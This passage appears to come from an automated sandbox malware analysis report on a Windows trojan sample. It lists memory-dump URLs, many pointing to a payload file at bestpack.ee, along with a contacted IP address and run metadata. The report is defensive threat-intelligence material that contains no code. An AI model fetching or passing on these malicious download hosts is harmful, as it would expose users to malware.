00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72346415547.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://bestpack.ee/slo.bin7SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://bestpack.ee/aSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72346415547.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://bestpack.ee/slo.bin7SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192333805.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737216556.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74965012912.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                  		unknown
                                                                  http://bestpack.ee/slo.bin=RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bestpack.ee/CISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://bestpack.ee/slo.bin=RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://bestpack.ee/SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://bestpack.ee/slo.bin/SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                              		unknown
                                                                              https://bestpack.ee/slo.binhSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://bestpack.ee/slo.bin.RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.quovadis.bm0SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72005247769.00000000066D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://bestpack.ee/hISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://bestpack.ee/slo.binhSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://bestpack.ee/slo.bin$SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ocsp.quovadisoffshore.com0SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72005247769.00000000066D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://bestpack.ee/slo.bin.RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://bestpack.ee/slo.binkedSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144773492.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192333805.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372413154.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737216556.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532927856.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030543463.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72802564337.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486784699.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74965012912.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916255979.00000000066BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://bestpack.ee/slo.bin/SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://bestpack.ee/slo.bin&SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    185.86.211.137
                                                                                                    		bestpack.eeSpain
                                                                                                    		50129TVHORADADAESfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1520710
                                                                                                    Start date and time:2024-09-27 18:56:02 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 14m 57s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                    Run name:Suspected Instruction Hammering
                                                                                                    Number of analysed new started processes analysed:3
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal60.troj.evad.winEXE@3/9@1/1
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 83%
                                                                                                    • Number of executed functions: 53
                                                                                                    • Number of non-executed functions: 31
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
